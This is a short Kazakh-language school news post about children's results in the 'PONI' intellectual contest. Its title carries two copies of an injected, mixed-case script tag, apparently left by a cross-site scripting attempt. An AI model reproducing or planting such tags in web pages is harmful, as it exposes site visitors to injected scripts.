"ПОНИ" балалар интеллектуалды байқауы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
15.03.2021
«Үркер» халықаралық зияткерлік орталығы «Перспектива» білім беру орталығымен бірлесіп, балалардың зияткерлік-шығармашылық қабілетін айқындау мақсатында «ПОНИ®» зияткерлік байқауларын өткізеді. Мектеп-балабақша бірнеше жыл бойы осы зияткерлік байқауға тәрбиеленушілерді қатыстыруды ұйымдастырып келеді.
Биылғы 2020-2021 оқу жылында да осы байқаудың күзгі кезеңіне ересек, мектепалды даярлық топтары мен 1- сынып оқушылары қатысты. Байқау нәтижесі бойынша көптеген балаларымыз жүлдегерлер мен жеңімпаздар атанды. «Үркер» халықаралық зияткерлік орталығының ұйымдастырушылық комитеті педагогтарымызға байқауларға балаларды қатыстыруды ұйымдастырғаны үшін Дипломдармен марапаттады.
Просмотров: 744